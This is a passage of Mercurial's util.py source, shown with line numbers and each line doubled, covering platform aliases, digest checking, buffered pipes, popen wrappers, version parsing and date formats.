35 import string
36 import subprocess
36 import subprocess
37 import sys
37 import sys
38 import tempfile
38 import tempfile
39 import textwrap
39 import textwrap
40 import time
40 import time
41 import traceback
41 import traceback
42 import warnings
42 import warnings
43 import zlib
43 import zlib
44
44
45 from . import (
45 from . import (
46 encoding,
46 encoding,
47 error,
47 error,
48 i18n,
48 i18n,
49 policy,
49 policy,
50 pycompat,
50 pycompat,
51 )
51 )
52
52
53 base85 = policy.importmod(r'base85')
53 base85 = policy.importmod(r'base85')
54 osutil = policy.importmod(r'osutil')
54 osutil = policy.importmod(r'osutil')
55 parsers = policy.importmod(r'parsers')
55 parsers = policy.importmod(r'parsers')
56
56
57 b85decode = base85.b85decode
57 b85decode = base85.b85decode
58 b85encode = base85.b85encode
58 b85encode = base85.b85encode
59
59
60 cookielib = pycompat.cookielib
60 cookielib = pycompat.cookielib
61 empty = pycompat.empty
61 empty = pycompat.empty
62 httplib = pycompat.httplib
62 httplib = pycompat.httplib
63 httpserver = pycompat.httpserver
63 httpserver = pycompat.httpserver
64 pickle = pycompat.pickle
64 pickle = pycompat.pickle
65 queue = pycompat.queue
65 queue = pycompat.queue
66 socketserver = pycompat.socketserver
66 socketserver = pycompat.socketserver
67 stderr = pycompat.stderr
67 stderr = pycompat.stderr
68 stdin = pycompat.stdin
68 stdin = pycompat.stdin
69 stdout = pycompat.stdout
69 stdout = pycompat.stdout
70 stringio = pycompat.stringio
70 stringio = pycompat.stringio
71 urlerr = pycompat.urlerr
71 urlerr = pycompat.urlerr
72 urlreq = pycompat.urlreq
72 urlreq = pycompat.urlreq
73 xmlrpclib = pycompat.xmlrpclib
73 xmlrpclib = pycompat.xmlrpclib
74
74
75 # workaround for win32mbcs
75 # workaround for win32mbcs
76 _filenamebytestr = pycompat.bytestr
76 _filenamebytestr = pycompat.bytestr
77
77
78 def isatty(fp):
78 def isatty(fp):
79 try:
79 try:
80 return fp.isatty()
80 return fp.isatty()
81 except AttributeError:
81 except AttributeError:
82 return False
82 return False
83
83
84 # glibc determines buffering on first write to stdout - if we replace a TTY
84 # glibc determines buffering on first write to stdout - if we replace a TTY
85 # destined stdout with a pipe destined stdout (e.g. pager), we want line
85 # destined stdout with a pipe destined stdout (e.g. pager), we want line
86 # buffering
86 # buffering
87 if isatty(stdout):
87 if isatty(stdout):
88 stdout = os.fdopen(stdout.fileno(), pycompat.sysstr('wb'), 1)
88 stdout = os.fdopen(stdout.fileno(), pycompat.sysstr('wb'), 1)
89
89
90 if pycompat.osname == 'nt':
90 if pycompat.osname == 'nt':
91 from . import windows as platform
91 from . import windows as platform
92 stdout = platform.winstdout(stdout)
92 stdout = platform.winstdout(stdout)
93 else:
93 else:
94 from . import posix as platform
94 from . import posix as platform
95
95
96 _ = i18n._
96 _ = i18n._
97
97
98 bindunixsocket = platform.bindunixsocket
98 bindunixsocket = platform.bindunixsocket
99 cachestat = platform.cachestat
99 cachestat = platform.cachestat
100 checkexec = platform.checkexec
100 checkexec = platform.checkexec
101 checklink = platform.checklink
101 checklink = platform.checklink
102 copymode = platform.copymode
102 copymode = platform.copymode
103 executablepath = platform.executablepath
103 executablepath = platform.executablepath
104 expandglobs = platform.expandglobs
104 expandglobs = platform.expandglobs
105 explainexit = platform.explainexit
105 explainexit = platform.explainexit
106 findexe = platform.findexe
106 findexe = platform.findexe
107 gethgcmd = platform.gethgcmd
107 gethgcmd = platform.gethgcmd
108 getuser = platform.getuser
108 getuser = platform.getuser
109 getpid = os.getpid
109 getpid = os.getpid
110 groupmembers = platform.groupmembers
110 groupmembers = platform.groupmembers
111 groupname = platform.groupname
111 groupname = platform.groupname
112 hidewindow = platform.hidewindow
112 hidewindow = platform.hidewindow
113 isexec = platform.isexec
113 isexec = platform.isexec
114 isowner = platform.isowner
114 isowner = platform.isowner
115 listdir = osutil.listdir
115 listdir = osutil.listdir
116 localpath = platform.localpath
116 localpath = platform.localpath
117 lookupreg = platform.lookupreg
117 lookupreg = platform.lookupreg
118 makedir = platform.makedir
118 makedir = platform.makedir
119 nlinks = platform.nlinks
119 nlinks = platform.nlinks
120 normpath = platform.normpath
120 normpath = platform.normpath
121 normcase = platform.normcase
121 normcase = platform.normcase
122 normcasespec = platform.normcasespec
122 normcasespec = platform.normcasespec
123 normcasefallback = platform.normcasefallback
123 normcasefallback = platform.normcasefallback
124 openhardlinks = platform.openhardlinks
124 openhardlinks = platform.openhardlinks
125 oslink = platform.oslink
125 oslink = platform.oslink
126 parsepatchoutput = platform.parsepatchoutput
126 parsepatchoutput = platform.parsepatchoutput
127 pconvert = platform.pconvert
127 pconvert = platform.pconvert
128 poll = platform.poll
128 poll = platform.poll
129 popen = platform.popen
129 popen = platform.popen
130 posixfile = platform.posixfile
130 posixfile = platform.posixfile
131 quotecommand = platform.quotecommand
131 quotecommand = platform.quotecommand
132 readpipe = platform.readpipe
132 readpipe = platform.readpipe
133 rename = platform.rename
133 rename = platform.rename
134 removedirs = platform.removedirs
134 removedirs = platform.removedirs
135 samedevice = platform.samedevice
135 samedevice = platform.samedevice
136 samefile = platform.samefile
136 samefile = platform.samefile
137 samestat = platform.samestat
137 samestat = platform.samestat
138 setbinary = platform.setbinary
138 setbinary = platform.setbinary
139 setflags = platform.setflags
139 setflags = platform.setflags
140 setsignalhandler = platform.setsignalhandler
140 setsignalhandler = platform.setsignalhandler
141 shellquote = platform.shellquote
141 shellquote = platform.shellquote
142 spawndetached = platform.spawndetached
142 spawndetached = platform.spawndetached
143 split = platform.split
143 split = platform.split
144 sshargs = platform.sshargs
144 sshargs = platform.sshargs
145 statfiles = getattr(osutil, 'statfiles', platform.statfiles)
145 statfiles = getattr(osutil, 'statfiles', platform.statfiles)
146 statisexec = platform.statisexec
146 statisexec = platform.statisexec
147 statislink = platform.statislink
147 statislink = platform.statislink
148 testpid = platform.testpid
148 testpid = platform.testpid
149 umask = platform.umask
149 umask = platform.umask
150 unlink = platform.unlink
150 unlink = platform.unlink
151 username = platform.username
151 username = platform.username
152
152
153 try:
153 try:
154 recvfds = osutil.recvfds
154 recvfds = osutil.recvfds
155 except AttributeError:
155 except AttributeError:
156 pass
156 pass
157 try:
157 try:
158 setprocname = osutil.setprocname
158 setprocname = osutil.setprocname
159 except AttributeError:
159 except AttributeError:
160 pass
160 pass
161
161
162 # Python compatibility
162 # Python compatibility
163
163
164 _notset = object()
164 _notset = object()
165
165
166 # disable Python's problematic floating point timestamps (issue4836)
166 # disable Python's problematic floating point timestamps (issue4836)
167 # (Python hypocritically says you shouldn't change this behavior in
167 # (Python hypocritically says you shouldn't change this behavior in
168 # libraries, and sure enough Mercurial is not a library.)
168 # libraries, and sure enough Mercurial is not a library.)
169 os.stat_float_times(False)
169 os.stat_float_times(False)
170
170
171 def safehasattr(thing, attr):
171 def safehasattr(thing, attr):
172 return getattr(thing, attr, _notset) is not _notset
172 return getattr(thing, attr, _notset) is not _notset
173
173
174 def bitsfrom(container):
174 def bitsfrom(container):
175 bits = 0
175 bits = 0
176 for bit in container:
176 for bit in container:
177 bits |= bit
177 bits |= bit
178 return bits
178 return bits
179
179
180 # python 2.6 still have deprecation warning enabled by default. We do not want
180 # python 2.6 still have deprecation warning enabled by default. We do not want
181 # to display anything to standard user so detect if we are running test and
181 # to display anything to standard user so detect if we are running test and
182 # only use python deprecation warning in this case.
182 # only use python deprecation warning in this case.
183 _dowarn = bool(encoding.environ.get('HGEMITWARNINGS'))
183 _dowarn = bool(encoding.environ.get('HGEMITWARNINGS'))
184 if _dowarn:
184 if _dowarn:
185 # explicitly unfilter our warning for python 2.7
185 # explicitly unfilter our warning for python 2.7
186 #
186 #
187 # The option of setting PYTHONWARNINGS in the test runner was investigated.
187 # The option of setting PYTHONWARNINGS in the test runner was investigated.
188 # However, module name set through PYTHONWARNINGS was exactly matched, so
188 # However, module name set through PYTHONWARNINGS was exactly matched, so
189 # we cannot set 'mercurial' and have it match eg: 'mercurial.scmutil'. This
189 # we cannot set 'mercurial' and have it match eg: 'mercurial.scmutil'. This
190 # makes the whole PYTHONWARNINGS thing useless for our usecase.
190 # makes the whole PYTHONWARNINGS thing useless for our usecase.
191 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'mercurial')
191 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'mercurial')
192 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext')
192 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext')
193 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext3rd')
193 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext3rd')
194
194
195 def nouideprecwarn(msg, version, stacklevel=1):
195 def nouideprecwarn(msg, version, stacklevel=1):
196 """Issue an python native deprecation warning
196 """Issue an python native deprecation warning
197
197
198 This is a noop outside of tests, use 'ui.deprecwarn' when possible.
198 This is a noop outside of tests, use 'ui.deprecwarn' when possible.
199 """
199 """
200 if _dowarn:
200 if _dowarn:
201 msg += ("\n(compatibility will be dropped after Mercurial-%s,"
201 msg += ("\n(compatibility will be dropped after Mercurial-%s,"
202 " update your code.)") % version
202 " update your code.)") % version
203 warnings.warn(msg, DeprecationWarning, stacklevel + 1)
203 warnings.warn(msg, DeprecationWarning, stacklevel + 1)
204
204
205 DIGESTS = {
205 DIGESTS = {
206 'md5': hashlib.md5,
206 'md5': hashlib.md5,
207 'sha1': hashlib.sha1,
207 'sha1': hashlib.sha1,
208 'sha512': hashlib.sha512,
208 'sha512': hashlib.sha512,
209 }
209 }
210 # List of digest types from strongest to weakest
210 # List of digest types from strongest to weakest
211 DIGESTS_BY_STRENGTH = ['sha512', 'sha1', 'md5']
211 DIGESTS_BY_STRENGTH = ['sha512', 'sha1', 'md5']
212
212
213 for k in DIGESTS_BY_STRENGTH:
213 for k in DIGESTS_BY_STRENGTH:
214 assert k in DIGESTS
214 assert k in DIGESTS
215
215
216 class digester(object):
216 class digester(object):
217 """helper to compute digests.
217 """helper to compute digests.
218
218
219 This helper can be used to compute one or more digests given their name.
219 This helper can be used to compute one or more digests given their name.
220
220
221 >>> d = digester(['md5', 'sha1'])
221 >>> d = digester(['md5', 'sha1'])
222 >>> d.update('foo')
222 >>> d.update('foo')
223 >>> [k for k in sorted(d)]
223 >>> [k for k in sorted(d)]
224 ['md5', 'sha1']
224 ['md5', 'sha1']
225 >>> d['md5']
225 >>> d['md5']
226 'acbd18db4cc2f85cedef654fccc4a4d8'
226 'acbd18db4cc2f85cedef654fccc4a4d8'
227 >>> d['sha1']
227 >>> d['sha1']
228 '0beec7b5ea3f0fdbc95d0dd47f3c5bc275da8a33'
228 '0beec7b5ea3f0fdbc95d0dd47f3c5bc275da8a33'
229 >>> digester.preferred(['md5', 'sha1'])
229 >>> digester.preferred(['md5', 'sha1'])
230 'sha1'
230 'sha1'
231 """
231 """
232
232
233 def __init__(self, digests, s=''):
233 def __init__(self, digests, s=''):
234 self._hashes = {}
234 self._hashes = {}
235 for k in digests:
235 for k in digests:
236 if k not in DIGESTS:
236 if k not in DIGESTS:
237 raise Abort(_('unknown digest type: %s') % k)
237 raise Abort(_('unknown digest type: %s') % k)
238 self._hashes[k] = DIGESTS[k]()
238 self._hashes[k] = DIGESTS[k]()
239 if s:
239 if s:
240 self.update(s)
240 self.update(s)
241
241
242 def update(self, data):
242 def update(self, data):
243 for h in self._hashes.values():
243 for h in self._hashes.values():
244 h.update(data)
244 h.update(data)
245
245
246 def __getitem__(self, key):
246 def __getitem__(self, key):
247 if key not in DIGESTS:
247 if key not in DIGESTS:
248 raise Abort(_('unknown digest type: %s') % k)
248 raise Abort(_('unknown digest type: %s') % k)
249 return self._hashes[key].hexdigest()
249 return self._hashes[key].hexdigest()
250
250
251 def __iter__(self):
251 def __iter__(self):
252 return iter(self._hashes)
252 return iter(self._hashes)
253
253
254 @staticmethod
254 @staticmethod
255 def preferred(supported):
255 def preferred(supported):
256 """returns the strongest digest type in both supported and DIGESTS."""
256 """returns the strongest digest type in both supported and DIGESTS."""
257
257
258 for k in DIGESTS_BY_STRENGTH:
258 for k in DIGESTS_BY_STRENGTH:
259 if k in supported:
259 if k in supported:
260 return k
260 return k
261 return None
261 return None
262
262
263 class digestchecker(object):
263 class digestchecker(object):
264 """file handle wrapper that additionally checks content against a given
264 """file handle wrapper that additionally checks content against a given
265 size and digests.
265 size and digests.
266
266
267 d = digestchecker(fh, size, {'md5': '...'})
267 d = digestchecker(fh, size, {'md5': '...'})
268
268
269 When multiple digests are given, all of them are validated.
269 When multiple digests are given, all of them are validated.
270 """
270 """
271
271
272 def __init__(self, fh, size, digests):
272 def __init__(self, fh, size, digests):
273 self._fh = fh
273 self._fh = fh
274 self._size = size
274 self._size = size
275 self._got = 0
275 self._got = 0
276 self._digests = dict(digests)
276 self._digests = dict(digests)
277 self._digester = digester(self._digests.keys())
277 self._digester = digester(self._digests.keys())
278
278
279 def read(self, length=-1):
279 def read(self, length=-1):
280 content = self._fh.read(length)
280 content = self._fh.read(length)
281 self._digester.update(content)
281 self._digester.update(content)
282 self._got += len(content)
282 self._got += len(content)
283 return content
283 return content
284
284
285 def validate(self):
285 def validate(self):
286 if self._size != self._got:
286 if self._size != self._got:
287 raise Abort(_('size mismatch: expected %d, got %d') %
287 raise Abort(_('size mismatch: expected %d, got %d') %
288 (self._size, self._got))
288 (self._size, self._got))
289 for k, v in self._digests.items():
289 for k, v in self._digests.items():
290 if v != self._digester[k]:
290 if v != self._digester[k]:
291 # i18n: first parameter is a digest name
291 # i18n: first parameter is a digest name
292 raise Abort(_('%s mismatch: expected %s, got %s') %
292 raise Abort(_('%s mismatch: expected %s, got %s') %
293 (k, v, self._digester[k]))
293 (k, v, self._digester[k]))
294
294
295 try:
295 try:
296 buffer = buffer
296 buffer = buffer
297 except NameError:
297 except NameError:
298 def buffer(sliceable, offset=0, length=None):
298 def buffer(sliceable, offset=0, length=None):
299 if length is not None:
299 if length is not None:
300 return memoryview(sliceable)[offset:offset + length]
300 return memoryview(sliceable)[offset:offset + length]
301 return memoryview(sliceable)[offset:]
301 return memoryview(sliceable)[offset:]
302
302
303 closefds = pycompat.osname == 'posix'
303 closefds = pycompat.osname == 'posix'
304
304
305 _chunksize = 4096
305 _chunksize = 4096
306
306
307 class bufferedinputpipe(object):
307 class bufferedinputpipe(object):
308 """a manually buffered input pipe
308 """a manually buffered input pipe
309
309
310 Python will not let us use buffered IO and lazy reading with 'polling' at
310 Python will not let us use buffered IO and lazy reading with 'polling' at
311 the same time. We cannot probe the buffer state and select will not detect
311 the same time. We cannot probe the buffer state and select will not detect
312 that data are ready to read if they are already buffered.
312 that data are ready to read if they are already buffered.
313
313
314 This class let us work around that by implementing its own buffering
314 This class let us work around that by implementing its own buffering
315 (allowing efficient readline) while offering a way to know if the buffer is
315 (allowing efficient readline) while offering a way to know if the buffer is
316 empty from the output (allowing collaboration of the buffer with polling).
316 empty from the output (allowing collaboration of the buffer with polling).
317
317
318 This class lives in the 'util' module because it makes use of the 'os'
318 This class lives in the 'util' module because it makes use of the 'os'
319 module from the python stdlib.
319 module from the python stdlib.
320 """
320 """
321
321
322 def __init__(self, input):
322 def __init__(self, input):
323 self._input = input
323 self._input = input
324 self._buffer = []
324 self._buffer = []
325 self._eof = False
325 self._eof = False
326 self._lenbuf = 0
326 self._lenbuf = 0
327
327
328 @property
328 @property
329 def hasbuffer(self):
329 def hasbuffer(self):
330 """True is any data is currently buffered
330 """True is any data is currently buffered
331
331
332 This will be used externally a pre-step for polling IO. If there is
332 This will be used externally a pre-step for polling IO. If there is
333 already data then no polling should be set in place."""
333 already data then no polling should be set in place."""
334 return bool(self._buffer)
334 return bool(self._buffer)
335
335
336 @property
336 @property
337 def closed(self):
337 def closed(self):
338 return self._input.closed
338 return self._input.closed
339
339
340 def fileno(self):
340 def fileno(self):
341 return self._input.fileno()
341 return self._input.fileno()
342
342
343 def close(self):
343 def close(self):
344 return self._input.close()
344 return self._input.close()
345
345
346 def read(self, size):
346 def read(self, size):
347 while (not self._eof) and (self._lenbuf < size):
347 while (not self._eof) and (self._lenbuf < size):
348 self._fillbuffer()
348 self._fillbuffer()
349 return self._frombuffer(size)
349 return self._frombuffer(size)
350
350
351 def readline(self, *args, **kwargs):
351 def readline(self, *args, **kwargs):
352 if 1 < len(self._buffer):
352 if 1 < len(self._buffer):
353 # this should not happen because both read and readline end with a
353 # this should not happen because both read and readline end with a
354 # _frombuffer call that collapse it.
354 # _frombuffer call that collapse it.
355 self._buffer = [''.join(self._buffer)]
355 self._buffer = [''.join(self._buffer)]
356 self._lenbuf = len(self._buffer[0])
356 self._lenbuf = len(self._buffer[0])
357 lfi = -1
357 lfi = -1
358 if self._buffer:
358 if self._buffer:
359 lfi = self._buffer[-1].find('\n')
359 lfi = self._buffer[-1].find('\n')
360 while (not self._eof) and lfi < 0:
360 while (not self._eof) and lfi < 0:
361 self._fillbuffer()
361 self._fillbuffer()
362 if self._buffer:
362 if self._buffer:
363 lfi = self._buffer[-1].find('\n')
363 lfi = self._buffer[-1].find('\n')
364 size = lfi + 1
364 size = lfi + 1
365 if lfi < 0: # end of file
365 if lfi < 0: # end of file
366 size = self._lenbuf
366 size = self._lenbuf
367 elif 1 < len(self._buffer):
367 elif 1 < len(self._buffer):
368 # we need to take previous chunks into account
368 # we need to take previous chunks into account
369 size += self._lenbuf - len(self._buffer[-1])
369 size += self._lenbuf - len(self._buffer[-1])
370 return self._frombuffer(size)
370 return self._frombuffer(size)
371
371
372 def _frombuffer(self, size):
372 def _frombuffer(self, size):
373 """return at most 'size' data from the buffer
373 """return at most 'size' data from the buffer
374
374
375 The data are removed from the buffer."""
375 The data are removed from the buffer."""
376 if size == 0 or not self._buffer:
376 if size == 0 or not self._buffer:
377 return ''
377 return ''
378 buf = self._buffer[0]
378 buf = self._buffer[0]
379 if 1 < len(self._buffer):
379 if 1 < len(self._buffer):
380 buf = ''.join(self._buffer)
380 buf = ''.join(self._buffer)
381
381
382 data = buf[:size]
382 data = buf[:size]
383 buf = buf[len(data):]
383 buf = buf[len(data):]
384 if buf:
384 if buf:
385 self._buffer = [buf]
385 self._buffer = [buf]
386 self._lenbuf = len(buf)
386 self._lenbuf = len(buf)
387 else:
387 else:
388 self._buffer = []
388 self._buffer = []
389 self._lenbuf = 0
389 self._lenbuf = 0
390 return data
390 return data
391
391
392 def _fillbuffer(self):
392 def _fillbuffer(self):
393 """read data to the buffer"""
393 """read data to the buffer"""
394 data = os.read(self._input.fileno(), _chunksize)
394 data = os.read(self._input.fileno(), _chunksize)
395 if not data:
395 if not data:
396 self._eof = True
396 self._eof = True
397 else:
397 else:
398 self._lenbuf += len(data)
398 self._lenbuf += len(data)
399 self._buffer.append(data)
399 self._buffer.append(data)
400
400
401 def popen2(cmd, env=None, newlines=False):
401 def popen2(cmd, env=None, newlines=False):
402 # Setting bufsize to -1 lets the system decide the buffer size.
402 # Setting bufsize to -1 lets the system decide the buffer size.
403 # The default for bufsize is 0, meaning unbuffered. This leads to
403 # The default for bufsize is 0, meaning unbuffered. This leads to
404 # poor performance on Mac OS X: http://bugs.python.org/issue4194
404 # poor performance on Mac OS X: http://bugs.python.org/issue4194
405 p = subprocess.Popen(cmd, shell=True, bufsize=-1,
405 p = subprocess.Popen(cmd, shell=True, bufsize=-1,
406 close_fds=closefds,
406 close_fds=closefds,
407 stdin=subprocess.PIPE, stdout=subprocess.PIPE,
407 stdin=subprocess.PIPE, stdout=subprocess.PIPE,
408 universal_newlines=newlines,
408 universal_newlines=newlines,
409 env=env)
409 env=env)
410 return p.stdin, p.stdout
410 return p.stdin, p.stdout
411
411
412 def popen3(cmd, env=None, newlines=False):
412 def popen3(cmd, env=None, newlines=False):
413 stdin, stdout, stderr, p = popen4(cmd, env, newlines)
413 stdin, stdout, stderr, p = popen4(cmd, env, newlines)
414 return stdin, stdout, stderr
414 return stdin, stdout, stderr
415
415
416 def popen4(cmd, env=None, newlines=False, bufsize=-1):
416 def popen4(cmd, env=None, newlines=False, bufsize=-1):
417 p = subprocess.Popen(cmd, shell=True, bufsize=bufsize,
417 p = subprocess.Popen(cmd, shell=True, bufsize=bufsize,
418 close_fds=closefds,
418 close_fds=closefds,
419 stdin=subprocess.PIPE, stdout=subprocess.PIPE,
419 stdin=subprocess.PIPE, stdout=subprocess.PIPE,
420 stderr=subprocess.PIPE,
420 stderr=subprocess.PIPE,
421 universal_newlines=newlines,
421 universal_newlines=newlines,
422 env=env)
422 env=env)
423 return p.stdin, p.stdout, p.stderr, p
423 return p.stdin, p.stdout, p.stderr, p
424
424
425 def version():
425 def version():
426 """Return version information if available."""
426 """Return version information if available."""
427 try:
427 try:
428 from . import __version__
428 from . import __version__
429 return __version__.version
429 return __version__.version
430 except ImportError:
430 except ImportError:
431 return 'unknown'
431 return 'unknown'
432
432
433 def versiontuple(v=None, n=4):
433 def versiontuple(v=None, n=4):
434 """Parses a Mercurial version string into an N-tuple.
434 """Parses a Mercurial version string into an N-tuple.
435
435
436 The version string to be parsed is specified with the ``v`` argument.
436 The version string to be parsed is specified with the ``v`` argument.
437 If it isn't defined, the current Mercurial version string will be parsed.
437 If it isn't defined, the current Mercurial version string will be parsed.
438
438
439 ``n`` can be 2, 3, or 4. Here is how some version strings map to
439 ``n`` can be 2, 3, or 4. Here is how some version strings map to
440 returned values:
440 returned values:
441
441
442 >>> v = '3.6.1+190-df9b73d2d444'
442 >>> v = '3.6.1+190-df9b73d2d444'
443 >>> versiontuple(v, 2)
443 >>> versiontuple(v, 2)
444 (3, 6)
444 (3, 6)
445 >>> versiontuple(v, 3)
445 >>> versiontuple(v, 3)
446 (3, 6, 1)
446 (3, 6, 1)
447 >>> versiontuple(v, 4)
447 >>> versiontuple(v, 4)
448 (3, 6, 1, '190-df9b73d2d444')
448 (3, 6, 1, '190-df9b73d2d444')
449
449
450 >>> versiontuple('3.6.1+190-df9b73d2d444+20151118')
450 >>> versiontuple('3.6.1+190-df9b73d2d444+20151118')
451 (3, 6, 1, '190-df9b73d2d444+20151118')
451 (3, 6, 1, '190-df9b73d2d444+20151118')
452
452
453 >>> v = '3.6'
453 >>> v = '3.6'
454 >>> versiontuple(v, 2)
454 >>> versiontuple(v, 2)
455 (3, 6)
455 (3, 6)
456 >>> versiontuple(v, 3)
456 >>> versiontuple(v, 3)
457 (3, 6, None)
457 (3, 6, None)
458 >>> versiontuple(v, 4)
458 >>> versiontuple(v, 4)
459 (3, 6, None, None)
459 (3, 6, None, None)
460
460
461 >>> v = '3.9-rc'
461 >>> v = '3.9-rc'
462 >>> versiontuple(v, 2)
462 >>> versiontuple(v, 2)
463 (3, 9)
463 (3, 9)
464 >>> versiontuple(v, 3)
464 >>> versiontuple(v, 3)
465 (3, 9, None)
465 (3, 9, None)
466 >>> versiontuple(v, 4)
466 >>> versiontuple(v, 4)
467 (3, 9, None, 'rc')
467 (3, 9, None, 'rc')
468
468
469 >>> v = '3.9-rc+2-02a8fea4289b'
469 >>> v = '3.9-rc+2-02a8fea4289b'
470 >>> versiontuple(v, 2)
470 >>> versiontuple(v, 2)
471 (3, 9)
471 (3, 9)
472 >>> versiontuple(v, 3)
472 >>> versiontuple(v, 3)
473 (3, 9, None)
473 (3, 9, None)
474 >>> versiontuple(v, 4)
474 >>> versiontuple(v, 4)
475 (3, 9, None, 'rc+2-02a8fea4289b')
475 (3, 9, None, 'rc+2-02a8fea4289b')
476 """
476 """
477 if not v:
477 if not v:
478 v = version()
478 v = version()
479 parts = remod.split('[\+-]', v, 1)
479 parts = remod.split('[\+-]', v, 1)
480 if len(parts) == 1:
480 if len(parts) == 1:
481 vparts, extra = parts[0], None
481 vparts, extra = parts[0], None
482 else:
482 else:
483 vparts, extra = parts
483 vparts, extra = parts
484
484
485 vints = []
485 vints = []
486 for i in vparts.split('.'):
486 for i in vparts.split('.'):
487 try:
487 try:
488 vints.append(int(i))
488 vints.append(int(i))
489 except ValueError:
489 except ValueError:
490 break
490 break
491 # (3, 6) -> (3, 6, None)
491 # (3, 6) -> (3, 6, None)
492 while len(vints) < 3:
492 while len(vints) < 3:
493 vints.append(None)
493 vints.append(None)
494
494
495 if n == 2:
495 if n == 2:
496 return (vints[0], vints[1])
496 return (vints[0], vints[1])
497 if n == 3:
497 if n == 3:
498 return (vints[0], vints[1], vints[2])
498 return (vints[0], vints[1], vints[2])
499 if n == 4:
499 if n == 4:
500 return (vints[0], vints[1], vints[2], extra)
500 return (vints[0], vints[1], vints[2], extra)
501
501
502 # used by parsedate
502 # used by parsedate
503 defaultdateformats = (
503 defaultdateformats = (
504 '%Y-%m-%dT%H:%M:%S', # the 'real' ISO8601
504 '%Y-%m-%dT%H:%M:%S', # the 'real' ISO8601
505 '%Y-%m-%dT%H:%M', # without seconds
505 '%Y-%m-%dT%H:%M', # without seconds
506 '%Y-%m-%dT%H%M%S', # another awful but legal variant without :
506 '%Y-%m-%dT%H%M%S', # another awful but legal variant without :
507 '%Y-%m-%dT%H%M', # without seconds
507 '%Y-%m-%dT%H%M', # without seconds
508 '%Y-%m-%d %H:%M:%S', # our common legal variant
508 '%Y-%m-%d %H:%M:%S', # our common legal variant
509 '%Y-%m-%d %H:%M', # without seconds
509 '%Y-%m-%d %H:%M', # without seconds
510 '%Y-%m-%d %H%M%S', # without :
510 '%Y-%m-%d %H%M%S', # without :
511 '%Y-%m-%d %H%M', # without seconds
511 '%Y-%m-%d %H%M', # without seconds
512 '%Y-%m-%d %I:%M:%S%p',
512 '%Y-%m-%d %I:%M:%S%p',
513 '%Y-%m-%d %H:%M',
513 '%Y-%m-%d %H:%M',
514 '%Y-%m-%d %I:%M%p',
514 '%Y-%m-%d %I:%M%p',
515 '%Y-%m-%d',
515 '%Y-%m-%d',
516 '%m-%d',
516 '%m-%d',
517 '%m/%d',
517 '%m/%d',
518 '%m/%d/%y',
518 '%m/%d/%y',
519 '%m/%d/%Y',
519 '%m/%d/%Y',
520 '%a %b %d %H:%M:%S %Y',
520 '%a %b %d %H:%M:%S %Y',
521 '%a %b %d %I:%M:%S%p %Y',
521 '%a %b %d %I:%M:%S%p %Y',
522 '%a, %d %b %Y %H:%M:%S', # GNU coreutils "/bin/date --rfc-2822"
522 '%a, %d %b %Y %H:%M:%S', # GNU coreutils "/bin/date --rfc-2822"
523 '%b %d %H:%M:%S %Y',
523 '%b %d %H:%M:%S %Y',
524 '%b %d %I:%M:%S%p %Y',
524 '%b %d %I:%M:%S%p %Y',
525 '%b %d %H:%M:%S',
525 '%b %d %H:%M:%S',
526 '%b %d %I:%M:%S%p',
526 '%b %d %I:%M:%S%p',
527 '%b %d %H:%M',
527 '%b %d %H:%M',
528 '%b %d %I:%M%p',
528 '%b %d %I:%M%p',
529 '%b %d %Y',
529 '%b %d %Y',
530 '%b %d',
530 '%b %d',
531 '%H:%M:%S',
531 '%H:%M:%S',
532 '%I:%M:%S%p',
532 '%I:%M:%S%p',
533 '%H:%M',
533 '%H:%M',
534 '%I:%M%p',
534 '%I:%M%p',
535 )
535 )
536
536
537 extendeddateformats = defaultdateformats + (
537 extendeddateformats = defaultdateformats + (
538 "%Y",
538 "%Y",
539 "%Y-%m",
539 "%Y-%m",
540 "%b",
540 "%b",
541 "%b %Y",
541 "%b %Y",
542 )
542 )
543
543
544 def cachefunc(func):
544 def cachefunc(func):
545 '''cache the result of function calls'''
545 '''cache the result of function calls'''
546 # XXX doesn't handle keywords args
546 # XXX doesn't handle keywords args
547 if func.__code__.co_argcount == 0:
547 if func.__code__.co_argcount == 0:
548 cache = []
548 cache = []
549 def f():
549 def f():
550 if len(cache) == 0:
550 if len(cache) == 0:
551 cache.append(func())
551 cache.append(func())
552 return cache[0]
552 return cache[0]
553 return f
553 return f
554 cache = {}
554 cache = {}
555 if func.__code__.co_argcount == 1:
555 if func.__code__.co_argcount == 1:
556 # we gain a small amount of time because
556 # we gain a small amount of time because
557 # we don't need to pack/unpack the list
557 # we don't need to pack/unpack the list
558 def f(arg):
558 def f(arg):
559 if arg not in cache:
559 if arg not in cache:
560 cache[arg] = func(arg)
560 cache[arg] = func(arg)
561 return cache[arg]
561 return cache[arg]
562 else:
562 else:
563 def f(*args):
563 def f(*args):
564 if args not in cache:
564 if args not in cache:
565 cache[args] = func(*args)
565 cache[args] = func(*args)
566 return cache[args]
566 return cache[args]
567
567
568 return f
568 return f
569
569
570 class sortdict(collections.OrderedDict):
570 class sortdict(collections.OrderedDict):
571 '''a simple sorted dictionary
571 '''a simple sorted dictionary
572
572
573 >>> d1 = sortdict([('a', 0), ('b', 1)])
573 >>> d1 = sortdict([('a', 0), ('b', 1)])
574 >>> d2 = d1.copy()
574 >>> d2 = d1.copy()
575 >>> d2
575 >>> d2
576 sortdict([('a', 0), ('b', 1)])
576 sortdict([('a', 0), ('b', 1)])
577 >>> d2.update([('a', 2)])
577 >>> d2.update([('a', 2)])
578 >>> d2.keys() # should still be in last-set order
578 >>> d2.keys() # should still be in last-set order
579 ['b', 'a']
579 ['b', 'a']
580 '''
580 '''
581
581
582 def __setitem__(self, key, value):
582 def __setitem__(self, key, value):
583 if key in self:
583 if key in self:
584 del self[key]
584 del self[key]
585 super(sortdict, self).__setitem__(key, value)
585 super(sortdict, self).__setitem__(key, value)
586
586
587 if pycompat.ispypy:
587 if pycompat.ispypy:
588 # __setitem__() isn't called as of PyPy 5.8.0
588 # __setitem__() isn't called as of PyPy 5.8.0
589 def update(self, src):
589 def update(self, src):
590 if isinstance(src, dict):
590 if isinstance(src, dict):
591 src = src.iteritems()
591 src = src.iteritems()
592 for k, v in src:
592 for k, v in src:
593 self[k] = v
593 self[k] = v
594
594
595 @contextlib.contextmanager
595 @contextlib.contextmanager
596 def acceptintervention(tr=None):
596 def acceptintervention(tr=None):
597 """A context manager that closes the transaction on InterventionRequired
597 """A context manager that closes the transaction on InterventionRequired
598
